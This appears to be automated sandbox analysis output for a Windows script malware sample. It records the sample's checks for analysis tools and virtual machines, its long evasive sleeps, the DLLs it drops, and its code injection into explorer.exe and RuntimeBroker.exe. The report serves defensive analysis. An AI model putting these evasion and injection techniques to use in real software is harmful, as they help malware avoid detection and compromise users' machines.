Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXEP
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXEH/
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.384292828.0000020569BD8000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE0*
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.384721582.0000020569BB1000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000003.384243725.0000020569BDE000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3154
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2830
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cwptyz3z.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ogress.psd Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\z00zcx10.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 2572 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\explorer.exe Code function: 29_2_04D0FD7C FindFirstFileW,FindFirstFileW, 29_2_04D0FD7C
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: explorer.exe, 0000001D.00000000.557138601.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001D.00000000.558460412.0000000007F40000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001D.00000000.557387268.0000000007C3C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00$
Source: explorer.exe, 0000001D.00000000.556930722.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.557387268.0000000007C3C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0s_
Source: RuntimeBroker.exe, 00000025.00000000.586510473.00000257BD05C000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000002.636197115.00000000044B1000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}lo
Source: ogress.psd.0.dr Binary or memory string: /ku ridg;> on g,saiprlFsF/o( gtts
Source: explorer.exe, 0000001D.00000000.557138601.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: RuntimeBroker.exe, 0000001F.00000002.623935103.000001E988E59000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0\?
Source: mshta.exe, 00000014.00000003.517212753.000002212B6F6000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
Source: explorer.exe, 0000001D.00000000.556930722.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}T7
Source: mshta.exe, 00000014.00000002.518870496.0000021926901000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\_
Source: explorer.exe, 0000001D.00000000.558460412.0000000007F40000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001D.00000000.558460412.0000000007F40000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001D.00000000.556930722.0000000007B29000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}6B
Source: mshta.exe, 00000014.00000003.517212753.000002212B6F6000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: control.exe, 0000001E.00000002.580413033.000001C3E66C4000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\4
Source: explorer.exe, 0000001D.00000000.557138601.0000000007BBC000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000001D.00000000.558460412.0000000007F40000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: ogress.psd.0.dr Jump to dropped file
Allocates memory in foreign processes
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E98B1C0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 135769E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 257BEBD0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: unknown base: 28E0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 1B5764B0000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FF91BA61580 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 1BA61580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 1BA61580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 1BA61580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 1BA61580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 1BA61580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7B0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7FF91BA61580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 28B0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3508 base: 7FF91BA61580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3508
Source: C:\Windows\explorer.exe Thread register set: target process: 3756
Source: C:\Windows\explorer.exe Thread register set: target process: 4292
Source: C:\Windows\explorer.exe Thread register set: target process: 4600
Source: C:\Windows\System32\control.exe Thread register set: target process: 3508
